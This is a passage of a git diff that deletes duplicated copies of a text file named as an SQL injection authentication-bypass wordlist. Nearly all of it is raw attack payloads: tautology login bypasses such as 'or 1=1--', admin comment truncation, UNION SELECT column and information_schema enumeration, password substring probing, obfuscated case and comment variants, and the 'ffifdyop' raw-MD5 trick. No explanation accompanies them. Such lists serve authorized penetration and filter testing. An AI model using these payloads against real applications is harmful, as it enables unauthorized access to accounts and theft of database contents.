-or true--
-" or true--
-' or true--
-") or true--
-') or true--
-' or 'x'='x
-') or ('x')=('x
-')) or (('x'))=(('x
-" or "x"="x
-") or ("x")=("x
-")) or (("x"))=(("x
-or 1=1
-or 1=1--
-or 1=1#
-or 1=1/*
-admin' --
-admin' #
-admin'/*
-admin' or '1'='1
-admin' or '1'='1'--
-admin' or '1'='1'#
-admin' or '1'='1'/*
-admin'or 1=1 or ''='
-admin' or 1=1
-admin' or 1=1--
-admin' or 1=1#
-admin' or 1=1/*
-admin') or ('1'='1
-admin') or ('1'='1'--
-admin') or ('1'='1'#
-admin') or ('1'='1'/*
-admin') or '1'='1
-admin') or '1'='1'--
-admin') or '1'='1'#
-admin') or '1'='1'/*
-1234 ' AND 1=0 UNION ALL SELECT 'admin', '81dc9bdb52d04dc20036dbd8313ed055
-admin" --
-admin" #
-admin"/*
-admin" or "1"="1
-admin" or "1"="1"--
-admin" or "1"="1"#
-admin" or "1"="1"/*
-admin"or 1=1 or ""="
-admin" or 1=1
-admin" or 1=1--
-admin" or 1=1#
-admin" or 1=1/*
-admin") or ("1"="1
-admin") or ("1"="1"--
-admin") or ("1"="1"#
-admin") or ("1"="1"/*
-admin") or "1"="1
-admin") or "1"="1"--
-admin") or "1"="1"#
-admin") or "1"="1"/*
-1234 " AND 1=0 UNION ALL SELECT "admin", "81dc9bdb52d04dc20036dbd8313ed055
-==
-=
-'
-' --
-' #
-' –
-'--
-'/*
-'#
-" --
-" #
-"/*
-' and 1='1
-' and a='a
- or 1=1
- or true
-' or ''='
-" or ""="
-1′) and '1′='1–
-' AND 1=0 UNION ALL SELECT '', '81dc9bdb52d04dc20036dbd8313ed055
-" AND 1=0 UNION ALL SELECT "", "81dc9bdb52d04dc20036dbd8313ed055
- and 1=1
- and 1=1–
-' and 'one'='one
-' and 'one'='one–
-' group by password having 1=1--
-' group by userid having 1=1--
-' group by username having 1=1--
- like '%'
- or 0=0 --
- or 0=0 #
- or 0=0 –
-' or 0=0 #
-' or 0=0 --
-' or 0=0 #
-' or 0=0 –
-" or 0=0 --
-" or 0=0 #
-" or 0=0 –
-%' or '0'='0
- or 1=1
- or 1=1--
- or 1=1/*
- or 1=1#
- or 1=1–
-' or 1=1--
-' or '1'='1
-' or '1'='1'--
-' or '1'='1'/*
-' or '1'='1'#
-' or '1′='1
-' or 1=1
-' or 1=1 --
-' or 1=1 –
-' or 1=1--
-' or 1=1;#
-' or 1=1/*
-' or 1=1#
-' or 1=1–
-') or '1'='1
-') or '1'='1--
-') or '1'='1'--
-') or '1'='1'/*
-') or '1'='1'#
-') or ('1'='1
-') or ('1'='1--
-') or ('1'='1'--
-') or ('1'='1'/*
-') or ('1'='1'#
-'or'1=1
-'or'1=1′
-" or "1"="1
-" or "1"="1"--
-" or "1"="1"/*
-" or "1"="1"#
-" or 1=1
-" or 1=1 --
-" or 1=1 –
-" or 1=1--
-" or 1=1/*
-" or 1=1#
-" or 1=1–
-") or "1"="1
-") or "1"="1"--
-") or "1"="1"/*
-") or "1"="1"#
-") or ("1"="1
-") or ("1"="1"--
-") or ("1"="1"/*
-") or ("1"="1"#
-) or '1′='1–
-) or ('1′='1–
-' or 1=1 LIMIT 1;#
-'or 1=1 or ''='
-"or 1=1 or ""="
-' or 'a'='a
-' or a=a--
-' or a=a–
-') or ('a'='a
-" or "a"="a
-") or ("a"="a
-') or ('a'='a and hi") or ("a"="a
-' or 'one'='one
-' or 'one'='one–
-' or uid like '%
-' or uname like '%
-' or userid like '%
-' or user like '%
-' or username like '%
-' or 'x'='x
-') or ('x'='x
-" or "x"="x
-' OR 'x'='x'#;
-'=' 'or' and '=' 'or'
-' UNION ALL SELECT 1, @@version;#
-' UNION ALL SELECT system_user(),user();#
-' UNION select table_schema,table_name FROM information_Schema.tables;#
-admin' and substring(password/text(),1,1)='7
-' and substring(password/text(),1,1)='7
-
-==
-=
-'
-"
-'-- 2
-'/*
-'#
-"-- 2
-" #
-"/*
-'-'
-'&'
-'^'
-'*'
-'='
-0'<'2
-"-"
-"&"
-"^"
-"*"
-"="
-0"<"2
-
-')
-")
-')-- 2
-')/*
-')#
-")-- 2
-") #
-")/*
-')-('
-')&('
-')^('
-')*('
-')=('
-0')<('2
-")-("
-")&("
-")^("
-")*("
-")=("
-0")<("2
-
-'-''-- 2
-'-''#
-'-''/*
-'&''-- 2
-'&''#
-'&''/*
-'^''-- 2
-'^''#
-'^''/*
-'*''-- 2
-'*''#
-'*''/*
-'=''-- 2
-'=''#
-'=''/*
-0'<'2'-- 2
-0'<'2'#
-0'<'2'/*
-"-""-- 2
-"-""#
-"-""/*
-"&""-- 2
-"&""#
-"&""/*
-"^""-- 2
-"^""#
-"^""/*
-"*""-- 2
-"*""#
-"*""/*
-"=""-- 2
-"=""#
-"=""/*
-0"<"2"-- 2
-0"<"2"#
-0"<"2"/*
-
-')-''-- 2
-')-''#
-')-''/*
-')&''-- 2
-')&''#
-')&''/*
-')^''-- 2
-')^''#
-')^''/*
-')*''-- 2
-')*''#
-')*''/*
-')=''-- 2
-')=''#
-')=''/*
-0')<'2'-- 2
-0')<'2'#
-0')<'2'/*
-")-""-- 2
-")-""#
-")-""/*
-")&""-- 2
-")&""#
-")&""/*
-")^""-- 2
-")^""#
-")^""/*
-")*""-- 2
-")*""#
-")*""/*
-")=""-- 2
-")=""#
-")=""/*
-0")<"2-- 2
-0")<"2#
-0")<"2/*
-
-
-'oR'2
-'oR'2'-- 2
-'oR'2'#
-'oR'2'/*
-'oR'2'oR'
-'oR(2)-- 2
-'oR(2)#
-'oR(2)/*
-'oR(2)oR'
-'oR 2-- 2
-'oR 2#
-'oR 2/*
-'oR 2 oR'
-'oR/**/2-- 2
-'oR/**/2#
-'oR/**/2/*
-'oR/**/2/**/oR'
-"oR"2
-"oR"2"-- 2
-"oR"2"#
-"oR"2"/*
-"oR"2"oR"
-"oR(2)-- 2
-"oR(2)#
-"oR(2)/*
-"oR(2)oR"
-"oR 2-- 2
-"oR 2#
-"oR 2/*
-"oR 2 oR"
-"oR/**/2-- 2
-"oR/**/2#
-"oR/**/2/*
-"oR/**/2/**/oR"
-
-'oR'2'='2
-'oR'2'='2'oR'
-'oR'2'='2'-- 2
-'oR'2'='2'#
-'oR'2'='2'/*
-'oR'2'='2'oR'
-'oR 2=2-- 2
-'oR 2=2#
-'oR 2=2/*
-'oR 2=2 oR'
-'oR/**/2=2-- 2
-'oR/**/2=2#
-'oR/**/2=2/*
-'oR/**/2=2/**/oR'
-'oR(2)=2-- 2
-'oR(2)=2#
-'oR(2)=2/*
-'oR(2)=2/*
-'oR(2)=(2)oR'
-'oR'2'='2' LimIT 1-- 2
-'oR'2'='2' LimIT 1#
-'oR'2'='2' LimIT 1/*
-'oR(2)=(2)LimIT(1)-- 2
-'oR(2)=(2)LimIT(1)#
-'oR(2)=(2)LimIT(1)/*
-"oR"2"="2
-"oR"2"="2"oR"
-"oR"2"="2"-- 2
-"oR"2"="2"#
-"oR"2"="2"/*
-"oR"2"="2"oR"
-"oR 2=2-- 2
-"oR 2=2#
-"oR 2=2/*
-"oR 2=2 oR"
-"oR/**/2=2-- 2
-"oR/**/2=2#
-"oR/**/2=2/*
-"oR/**/2=2/**/oR"
-"oR(2)=2-- 2
-"oR(2)=2#
-"oR(2)=2/*
-"oR(2)=2/*
-"oR(2)=(2)oR"
-"oR"2"="2" LimIT 1-- 2
-"oR"2"="2" LimIT 1#
-"oR"2"="2" LimIT 1/*
-"oR(2)=(2)LimIT(1)-- 2
-"oR(2)=(2)LimIT(1)#
-"oR(2)=(2)LimIT(1)/*
-
-'oR true-- 2
-'oR true#
-'oR true/*
-'oR true oR'
-'oR(true)-- 2
-'oR(true)#
-'oR(true)/*
-'oR(true)oR'
-'oR/**/true-- 2
-'oR/**/true#
-'oR/**/true/*
-'oR/**/true/**/oR'
-"oR true-- 2
-"oR true#
-"oR true/*
-"oR true oR"
-"oR(true)-- 2
-"oR(true)#
-"oR(true)/*
-"oR(true)oR"
-"oR/**/true-- 2
-"oR/**/true#
-"oR/**/true/*
-"oR/**/true/**/oR"
-
-'oR'2'LiKE'2
-'oR'2'LiKE'2'-- 2
-'oR'2'LiKE'2'#
-'oR'2'LiKE'2'/*
-'oR'2'LiKE'2'oR'
-'oR(2)LiKE(2)-- 2
-'oR(2)LiKE(2)#
-'oR(2)LiKE(2)/*
-'oR(2)LiKE(2)oR'
-"oR"2"LiKE"2
-"oR"2"LiKE"2"-- 2
-"oR"2"LiKE"2"#
-"oR"2"LiKE"2"/*
-"oR"2"LiKE"2"oR"
-"oR(2)LiKE(2)-- 2
-"oR(2)LiKE(2)#
-"oR(2)LiKE(2)/*
-"oR(2)LiKE(2)oR"
-
-admin
-admin'-- 2
-admin'#
-admin'/*
-admin"-- 2
-admin"#
-ffifdyop
-
-' UniON SElecT 1,2-- 2
-' UniON SElecT 1,2,3-- 2
-' UniON SElecT 1,2,3,4-- 2
-' UniON SElecT 1,2,3,4,5-- 2
-' UniON SElecT 1,2#
-' UniON SElecT 1,2,3#
-' UniON SElecT 1,2,3,4#
-' UniON SElecT 1,2,3,4,5#
-'UniON(SElecT(1),2)-- 2
-'UniON(SElecT(1),2,3)-- 2
-'UniON(SElecT(1),2,3,4)-- 2
-'UniON(SElecT(1),2,3,4,5)-- 2
-'UniON(SElecT(1),2)#
-'UniON(SElecT(1),2,3)#
-'UniON(SElecT(1),2,3,4)#
-'UniON(SElecT(1),2,3,4,5)#
-" UniON SElecT 1,2-- 2
-" UniON SElecT 1,2,3-- 2
-" UniON SElecT 1,2,3,4-- 2
-" UniON SElecT 1,2,3,4,5-- 2
-" UniON SElecT 1,2#
-" UniON SElecT 1,2,3#
-" UniON SElecT 1,2,3,4#
-" UniON SElecT 1,2,3,4,5#
-"UniON(SElecT(1),2)-- 2
-"UniON(SElecT(1),2,3)-- 2
-"UniON(SElecT(1),2,3,4)-- 2
-"UniON(SElecT(1),2,3,4,5)-- 2
-"UniON(SElecT(1),2)#
-"UniON(SElecT(1),2,3)#
-"UniON(SElecT(1),2,3,4)#
-"UniON(SElecT(1),2,3,4,5)#
-
-'||'2
-'||2-- 2
-'||'2'||'
-'||2#
-'||2/*
-'||2||'
-"||"2
-"||2-- 2
-"||"2"||"
-"||2#
-"||2/*
-"||2||"
-'||'2'='2
-'||'2'='2'||'
-'||2=2-- 2
-'||2=2#
-'||2=2/*
-'||2=2||'
-"||"2"="2
-"||"2"="2"||"
-"||2=2-- 2
-"||2=2#
-"||2=2/*
-"||2=2||"
-'||2=(2)LimIT(1)-- 2
-'||2=(2)LimIT(1)#
-'||2=(2)LimIT(1)/*
-"||2=(2)LimIT(1)-- 2
-"||2=(2)LimIT(1)#
-"||2=(2)LimIT(1)/*
-'||true-- 2
-'||true#
-'||true/*
-'||true||'
-"||true-- 2
-"||true#
-"||true/*
-"||true||"
-'||'2'LiKE'2
-'||'2'LiKE'2'-- 2
-'||'2'LiKE'2'#
-'||'2'LiKE'2'/*
-'||'2'LiKE'2'||'
-'||(2)LiKE(2)-- 2
-'||(2)LiKE(2)#
-'||(2)LiKE(2)/*
-'||(2)LiKE(2)||'
-"||"2"LiKE"2
-"||"2"LiKE"2"-- 2
-"||"2"LiKE"2"#
-"||"2"LiKE"2"/*
-"||"2"LiKE"2"||"
-"||(2)LiKE(2)-- 2
-"||(2)LiKE(2)#
-"||(2)LiKE(2)/*
-"||(2)LiKE(2)||"
-
-')oR('2
-')oR'2'-- 2
-')oR'2'#
-')oR'2'/*
-')oR'2'oR('
-')oR(2)-- 2
-')oR(2)#
-')oR(2)/*
-')oR(2)oR('
-')oR 2-- 2
-')oR 2#
-')oR 2/*
-')oR 2 oR('
-')oR/**/2-- 2
-')oR/**/2#
-')oR/**/2/*
-')oR/**/2/**/oR('
-")oR("2
-")oR"2"-- 2
-")oR"2"#
-")oR"2"/*
-")oR"2"oR("
-")oR(2)-- 2
-")oR(2)#
-")oR(2)/*
-")oR(2)oR("
-")oR 2-- 2
-")oR 2#
-")oR 2/*
-")oR 2 oR("
-")oR/**/2-- 2
-")oR/**/2#
-")oR/**/2/*
-")oR/**/2/**/oR("
-')oR'2'=('2
-')oR'2'='2'oR('
-')oR'2'='2'-- 2
-')oR'2'='2'#
-')oR'2'='2'/*
-')oR'2'='2'oR('
-')oR 2=2-- 2
-')oR 2=2#
-')oR 2=2/*
-')oR 2=2 oR('
-')oR/**/2=2-- 2
-')oR/**/2=2#
-')oR/**/2=2/*
-')oR/**/2=2/**/oR('
-')oR(2)=2-- 2
-')oR(2)=2#
-')oR(2)=2/*
-')oR(2)=2/*
-')oR(2)=(2)oR('
-')oR'2'='2' LimIT 1-- 2
-')oR'2'='2' LimIT 1#
-')oR'2'='2' LimIT 1/*
-')oR(2)=(2)LimIT(1)-- 2
-')oR(2)=(2)LimIT(1)#
-')oR(2)=(2)LimIT(1)/*
-")oR"2"=("2
-")oR"2"="2"oR("
-")oR"2"="2"-- 2
-")oR"2"="2"#
-")oR"2"="2"/*
-")oR"2"="2"oR("
-")oR 2=2-- 2
-")oR 2=2#
-")oR 2=2/*
-")oR 2=2 oR("
-")oR/**/2=2-- 2
-")oR/**/2=2#
-")oR/**/2=2/*
-")oR/**/2=2/**/oR("
-")oR(2)=2-- 2
-")oR(2)=2#
-")oR(2)=2/*
-")oR(2)=2/*
-")oR(2)=(2)oR("
-")oR"2"="2" LimIT 1-- 2
-")oR"2"="2" LimIT 1#
-")oR"2"="2" LimIT 1/*
-")oR(2)=(2)LimIT(1)-- 2
-")oR(2)=(2)LimIT(1)#
-")oR(2)=(2)LimIT(1)/*
-')oR true-- 2
-')oR true#
-')oR true/*
-')oR true oR('
-')oR(true)-- 2
-')oR(true)#
-')oR(true)/*
-')oR(true)oR('
-')oR/**/true-- 2
-')oR/**/true#
-')oR/**/true/*
-')oR/**/true/**/oR('
-")oR true-- 2
-")oR true#
-")oR true/*
-")oR true oR("
-")oR(true)-- 2
-")oR(true)#
-")oR(true)/*
-")oR(true)oR("
-")oR/**/true-- 2
-")oR/**/true#
-")oR/**/true/*
-")oR/**/true/**/oR("
-')oR'2'LiKE('2
-')oR'2'LiKE'2'-- 2
-')oR'2'LiKE'2'#
-')oR'2'LiKE'2'/*
-')oR'2'LiKE'2'oR('
-')oR(2)LiKE(2)-- 2
-')oR(2)LiKE(2)#
-')oR(2)LiKE(2)/*
-')oR(2)LiKE(2)oR('
-")oR"2"LiKE("2
-")oR"2"LiKE"2"-- 2
-")oR"2"LiKE"2"#
-")oR"2"LiKE"2"/*
-")oR"2"LiKE"2"oR("
-")oR(2)LiKE(2)-- 2
-")oR(2)LiKE(2)#
-")oR(2)LiKE(2)/*
-")oR(2)LiKE(2)oR("
-admin')-- 2
-admin')#
-admin')/*
-admin")-- 2
-admin")#
-') UniON SElecT 1,2-- 2
-') UniON SElecT 1,2,3-- 2
-') UniON SElecT 1,2,3,4-- 2
-') UniON SElecT 1,2,3,4,5-- 2
-') UniON SElecT 1,2#
-') UniON SElecT 1,2,3#
-') UniON SElecT 1,2,3,4#
-') UniON SElecT 1,2,3,4,5#
-')UniON(SElecT(1),2)-- 2
-')UniON(SElecT(1),2,3)-- 2
-')UniON(SElecT(1),2,3,4)-- 2
-')UniON(SElecT(1),2,3,4,5)-- 2
-')UniON(SElecT(1),2)#
-')UniON(SElecT(1),2,3)#
-')UniON(SElecT(1),2,3,4)#
-')UniON(SElecT(1),2,3,4,5)#
-") UniON SElecT 1,2-- 2
-") UniON SElecT 1,2,3-- 2
-") UniON SElecT 1,2,3,4-- 2
-") UniON SElecT 1,2,3,4,5-- 2
-") UniON SElecT 1,2#
-") UniON SElecT 1,2,3#
-") UniON SElecT 1,2,3,4#
-") UniON SElecT 1,2,3,4,5#
-")UniON(SElecT(1),2)-- 2
-")UniON(SElecT(1),2,3)-- 2
-")UniON(SElecT(1),2,3,4)-- 2
-")UniON(SElecT(1),2,3,4,5)-- 2
-")UniON(SElecT(1),2)#
-")UniON(SElecT(1),2,3)#
-")UniON(SElecT(1),2,3,4)#
-")UniON(SElecT(1),2,3,4,5)#
-')||('2
-')||2-- 2
-')||'2'||('
-')||2#
-')||2/*
-')||2||('
-")||("2
-")||2-- 2
-")||"2"||("
-")||2#
-")||2/*
-")||2||("
-')||'2'=('2
-')||'2'='2'||('
-')||2=2-- 2
-')||2=2#
-')||2=2/*
-')||2=2||('
-")||"2"=("2
-")||"2"="2"||("
-")||2=2-- 2
-")||2=2#
-")||2=2/*
-")||2=2||("
-')||2=(2)LimIT(1)-- 2
-')||2=(2)LimIT(1)#
-')||2=(2)LimIT(1)/*
-")||2=(2)LimIT(1)-- 2
-")||2=(2)LimIT(1)#
-")||2=(2)LimIT(1)/*
-')||true-- 2
-')||true#
-')||true/*
-')||true||('
-")||true-- 2
-")||true#
-")||true/*
-")||true||("
-')||'2'LiKE('2
-')||'2'LiKE'2'-- 2
-')||'2'LiKE'2'#
-')||'2'LiKE'2'/*
-')||'2'LiKE'2'||('
-')||(2)LiKE(2)-- 2
-')||(2)LiKE(2)#
-')||(2)LiKE(2)/*
-')||(2)LiKE(2)||('
-")||"2"LiKE("2
-")||"2"LiKE"2"-- 2
-")||"2"LiKE"2"#
-")||"2"LiKE"2"/*
-")||"2"LiKE"2"||("
-")||(2)LiKE(2)-- 2
-")||(2)LiKE(2)#
-")||(2)LiKE(2)/*
-")||(2)LiKE(2)||("
-' UnION SELeCT 1,2`
-' UnION SELeCT 1,2,3`
-' UnION SELeCT 1,2,3,4`
-' UnION SELeCT 1,2,3,4,5`
-" UnION SELeCT 1,2`
-" UnION SELeCT 1,2,3`
-" UnION SELeCT 1,2,3,4`
-" UnION SELeCT 1,2,3,4,5`
\ No newline at end of file
diff --git a/src/images/sqli-authbypass-big (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1).txt b/src/images/sqli-authbypass-big (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1).txt
deleted file mode 100644
index 5a03da57f..000000000
--- a/src/images/sqli-authbypass-big (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1).txt
+++ /dev/null
@@ -1,771 +0,0 @@
-'-'
-' '
-'&'
-'^'
-'*'
-' or ''-'
-' or '' '
-' or ''&'
-' or ''^'
-' or ''*'
-"-"
-" "
-"&"
-"^"
-"*"
-" or ""-"
-" or "" "
-" or ""&"
-" or ""^"
-" or ""*"
-or true--
-" or true--
-' or true--
-") or true--
-') or true--
-' or 'x'='x
-') or ('x')=('x
-')) or (('x'))=(('x
-" or "x"="x
-") or ("x")=("x
-")) or (("x"))=(("x
-or 1=1
-or 1=1--
-or 1=1#
-or 1=1/*
-admin' --
-admin' #
-admin'/*
-admin' or '1'='1
-admin' or '1'='1'--
-admin' or '1'='1'#
-admin' or '1'='1'/*
-admin'or 1=1 or ''='
-admin' or 1=1
-admin' or 1=1--
-admin' or 1=1#
-admin' or 1=1/*
-admin') or ('1'='1
-admin') or ('1'='1'--
-admin') or ('1'='1'#
-admin') or ('1'='1'/*
-admin') or '1'='1
-admin') or '1'='1'--
-admin') or '1'='1'#
-admin') or '1'='1'/*
-1234 ' AND 1=0 UNION ALL SELECT 'admin', '81dc9bdb52d04dc20036dbd8313ed055
-admin" --
-admin" #
-admin"/*
-admin" or "1"="1
-admin" or "1"="1"--
-admin" or "1"="1"#
-admin" or "1"="1"/*
-admin"or 1=1 or ""="
-admin" or 1=1
-admin" or 1=1--
-admin" or 1=1#
-admin" or 1=1/*
-admin") or ("1"="1
-admin") or ("1"="1"--
-admin") or ("1"="1"#
-admin") or ("1"="1"/*
-admin") or "1"="1
-admin") or "1"="1"--
-admin") or "1"="1"#
-admin") or "1"="1"/*
-1234 " AND 1=0 UNION ALL SELECT "admin", "81dc9bdb52d04dc20036dbd8313ed055
-==
-=
-'
-' --
-' #
-' –
-'--
-'/*
-'#
-" --
-" #
-"/*
-' and 1='1
-' and a='a
- or 1=1
- or true
-' or ''='
-" or ""="
-1′) and '1′='1–
-' AND 1=0 UNION ALL SELECT '', '81dc9bdb52d04dc20036dbd8313ed055
-" AND 1=0 UNION ALL SELECT "", "81dc9bdb52d04dc20036dbd8313ed055
- and 1=1
- and 1=1–
-' and 'one'='one
-' and 'one'='one–
-' group by password having 1=1--
-' group by userid having 1=1--
-' group by username having 1=1--
- like '%'
- or 0=0 --
- or 0=0 #
- or 0=0 –
-' or 0=0 #
-' or 0=0 --
-' or 0=0 #
-' or 0=0 –
-" or 0=0 --
-" or 0=0 #
-" or 0=0 –
-%' or '0'='0
- or 1=1
- or 1=1--
- or 1=1/*
- or 1=1#
- or 1=1–
-' or 1=1--
-' or '1'='1
-' or '1'='1'--
-' or '1'='1'/*
-' or '1'='1'#
-' or '1′='1
-' or 1=1
-' or 1=1 --
-' or 1=1 –
-' or 1=1--
-' or 1=1;#
-' or 1=1/*
-' or 1=1#
-' or 1=1–
-') or '1'='1
-') or '1'='1--
-') or '1'='1'--
-') or '1'='1'/*
-') or '1'='1'#
-') or ('1'='1
-') or ('1'='1--
-') or ('1'='1'--
-') or ('1'='1'/*
-') or ('1'='1'#
-'or'1=1
-'or'1=1′
-" or "1"="1
-" or "1"="1"--
-" or "1"="1"/*
-" or "1"="1"#
-" or 1=1
-" or 1=1 --
-" or 1=1 –
-" or 1=1--
-" or 1=1/*
-" or 1=1#
-" or 1=1–
-") or "1"="1
-") or "1"="1"--
-") or "1"="1"/*
-") or "1"="1"#
-") or ("1"="1
-") or ("1"="1"--
-") or ("1"="1"/*
-") or ("1"="1"#
-) or '1′='1–
-) or ('1′='1–
-' or 1=1 LIMIT 1;#
-'or 1=1 or ''='
-"or 1=1 or ""="
-' or 'a'='a
-' or a=a--
-' or a=a–
-') or ('a'='a
-" or "a"="a
-") or ("a"="a
-') or ('a'='a and hi") or ("a"="a
-' or 'one'='one
-' or 'one'='one–
-' or uid like '%
-' or uname like '%
-' or userid like '%
-' or user like '%
-' or username like '%
-' or 'x'='x
-') or ('x'='x
-" or "x"="x
-' OR 'x'='x'#;
-'=' 'or' and '=' 'or'
-' UNION ALL SELECT 1, @@version;#
-' UNION ALL SELECT system_user(),user();#
-' UNION select table_schema,table_name FROM information_Schema.tables;#
-admin' and substring(password/text(),1,1)='7
-' and substring(password/text(),1,1)='7
-
-==
-=
-'
-"
-'-- 2
-'/*
-'#
-"-- 2
-" #
-"/*
-'-'
-'&'
-'^'
-'*'
-'='
-0'<'2
-"-"
-"&"
-"^"
-"*"
-"="
-0"<"2
-
-')
-")
-')-- 2
-')/*
-')#
-")-- 2
-") #
-")/*
-')-('
-')&('
-')^('
-')*('
-')=('
-0')<('2
-")-("
-")&("
-")^("
-")*("
-")=("
-0")<("2
-
-'-''-- 2
-'-''#
-'-''/*
-'&''-- 2
-'&''#
-'&''/*
-'^''-- 2
-'^''#
-'^''/*
-'*''-- 2
-'*''#
-'*''/*
-'=''-- 2
-'=''#
-'=''/*
-0'<'2'-- 2
-0'<'2'#
-0'<'2'/*
-"-""-- 2
-"-""#
-"-""/*
-"&""-- 2
-"&""#
-"&""/*
-"^""-- 2
-"^""#
-"^""/*
-"*""-- 2
-"*""#
-"*""/*
-"=""-- 2
-"=""#
-"=""/*
-0"<"2"-- 2
-0"<"2"#
-0"<"2"/*
-
-')-''-- 2
-')-''#
-')-''/*
-')&''-- 2
-')&''#
-')&''/*
-')^''-- 2
-')^''#
-')^''/*
-')*''-- 2
-')*''#
-')*''/*
-')=''-- 2
-')=''#
-')=''/*
-0')<'2'-- 2
-0')<'2'#
-0')<'2'/*
-")-""-- 2
-")-""#
-")-""/*
-")&""-- 2
-")&""#
-")&""/*
-")^""-- 2
-")^""#
-")^""/*
-")*""-- 2
-")*""#
-")*""/*
-")=""-- 2
-")=""#
-")=""/*
-0")<"2-- 2
-0")<"2#
-0")<"2/*
-
-
-'oR'2
-'oR'2'-- 2
-'oR'2'#
-'oR'2'/*
-'oR'2'oR'
-'oR(2)-- 2
-'oR(2)#
-'oR(2)/*
-'oR(2)oR'
-'oR 2-- 2
-'oR 2#
-'oR 2/*
-'oR 2 oR'
-'oR/**/2-- 2
-'oR/**/2#
-'oR/**/2/*
-'oR/**/2/**/oR'
-"oR"2
-"oR"2"-- 2
-"oR"2"#
-"oR"2"/*
-"oR"2"oR"
-"oR(2)-- 2
-"oR(2)#
-"oR(2)/*
-"oR(2)oR"
-"oR 2-- 2
-"oR 2#
-"oR 2/*
-"oR 2 oR"
-"oR/**/2-- 2
-"oR/**/2#
-"oR/**/2/*
-"oR/**/2/**/oR"
-
-'oR'2'='2
-'oR'2'='2'oR'
-'oR'2'='2'-- 2
-'oR'2'='2'#
-'oR'2'='2'/*
-'oR'2'='2'oR'
-'oR 2=2-- 2
-'oR 2=2#
-'oR 2=2/*
-'oR 2=2 oR'
-'oR/**/2=2-- 2
-'oR/**/2=2#
-'oR/**/2=2/*
-'oR/**/2=2/**/oR'
-'oR(2)=2-- 2
-'oR(2)=2#
-'oR(2)=2/*
-'oR(2)=2/*
-'oR(2)=(2)oR'
-'oR'2'='2' LimIT 1-- 2
-'oR'2'='2' LimIT 1#
-'oR'2'='2' LimIT 1/*
-'oR(2)=(2)LimIT(1)-- 2
-'oR(2)=(2)LimIT(1)#
-'oR(2)=(2)LimIT(1)/*
-"oR"2"="2
-"oR"2"="2"oR"
-"oR"2"="2"-- 2
-"oR"2"="2"#
-"oR"2"="2"/*
-"oR"2"="2"oR"
-"oR 2=2-- 2
-"oR 2=2#
-"oR 2=2/*
-"oR 2=2 oR"
-"oR/**/2=2-- 2
-"oR/**/2=2#
-"oR/**/2=2/*
-"oR/**/2=2/**/oR"
-"oR(2)=2-- 2
-"oR(2)=2#
-"oR(2)=2/*
-"oR(2)=2/*
-"oR(2)=(2)oR"
-"oR"2"="2" LimIT 1-- 2
-"oR"2"="2" LimIT 1#
-"oR"2"="2" LimIT 1/*
-"oR(2)=(2)LimIT(1)-- 2
-"oR(2)=(2)LimIT(1)#
-"oR(2)=(2)LimIT(1)/*
-
-'oR true-- 2
-'oR true#
-'oR true/*
-'oR true oR'
-'oR(true)-- 2
-'oR(true)#
-'oR(true)/*
-'oR(true)oR'
-'oR/**/true-- 2
-'oR/**/true#
-'oR/**/true/*
-'oR/**/true/**/oR'
-"oR true-- 2
-"oR true#
-"oR true/*
-"oR true oR"
-"oR(true)-- 2
-"oR(true)#
-"oR(true)/*
-"oR(true)oR"
-"oR/**/true-- 2
-"oR/**/true#
-"oR/**/true/*
-"oR/**/true/**/oR"
-
-'oR'2'LiKE'2
-'oR'2'LiKE'2'-- 2
-'oR'2'LiKE'2'#
-'oR'2'LiKE'2'/*
-'oR'2'LiKE'2'oR'
-'oR(2)LiKE(2)-- 2
-'oR(2)LiKE(2)#
-'oR(2)LiKE(2)/*
-'oR(2)LiKE(2)oR'
-"oR"2"LiKE"2
-"oR"2"LiKE"2"-- 2
-"oR"2"LiKE"2"#
-"oR"2"LiKE"2"/*
-"oR"2"LiKE"2"oR"
-"oR(2)LiKE(2)-- 2
-"oR(2)LiKE(2)#
-"oR(2)LiKE(2)/*
-"oR(2)LiKE(2)oR"
-
-admin
-admin'-- 2
-admin'#
-admin'/*
-admin"-- 2
-admin"#
-ffifdyop
-
-' UniON SElecT 1,2-- 2
-' UniON SElecT 1,2,3-- 2
-' UniON SElecT 1,2,3,4-- 2
-' UniON SElecT 1,2,3,4,5-- 2
-' UniON SElecT 1,2#
-' UniON SElecT 1,2,3#
-' UniON SElecT 1,2,3,4#
-' UniON SElecT 1,2,3,4,5#
-'UniON(SElecT(1),2)-- 2
-'UniON(SElecT(1),2,3)-- 2
-'UniON(SElecT(1),2,3,4)-- 2
-'UniON(SElecT(1),2,3,4,5)-- 2
-'UniON(SElecT(1),2)#
-'UniON(SElecT(1),2,3)#
-'UniON(SElecT(1),2,3,4)#
-'UniON(SElecT(1),2,3,4,5)#
-" UniON SElecT 1,2-- 2
-" UniON SElecT 1,2,3-- 2
-" UniON SElecT 1,2,3,4-- 2
-" UniON SElecT 1,2,3,4,5-- 2
-" UniON SElecT 1,2#
-" UniON SElecT 1,2,3#
-" UniON SElecT 1,2,3,4#
-" UniON SElecT 1,2,3,4,5#
-"UniON(SElecT(1),2)-- 2
-"UniON(SElecT(1),2,3)-- 2
-"UniON(SElecT(1),2,3,4)-- 2
-"UniON(SElecT(1),2,3,4,5)-- 2
-"UniON(SElecT(1),2)#
-"UniON(SElecT(1),2,3)#
-"UniON(SElecT(1),2,3,4)#
-"UniON(SElecT(1),2,3,4,5)#
-
-'||'2
-'||2-- 2
-'||'2'||'
-'||2#
-'||2/*
-'||2||'
-"||"2
-"||2-- 2
-"||"2"||"
-"||2#
-"||2/*
-"||2||"
-'||'2'='2
-'||'2'='2'||'
-'||2=2-- 2
-'||2=2#
-'||2=2/*
-'||2=2||'
-"||"2"="2
-"||"2"="2"||"
-"||2=2-- 2
-"||2=2#
-"||2=2/*
-"||2=2||"
-'||2=(2)LimIT(1)-- 2
-'||2=(2)LimIT(1)#
-'||2=(2)LimIT(1)/*
-"||2=(2)LimIT(1)-- 2
-"||2=(2)LimIT(1)#
-"||2=(2)LimIT(1)/*
-'||true-- 2
-'||true#
-'||true/*
-'||true||'
-"||true-- 2
-"||true#
-"||true/*
-"||true||"
-'||'2'LiKE'2
-'||'2'LiKE'2'-- 2
-'||'2'LiKE'2'#
-'||'2'LiKE'2'/*
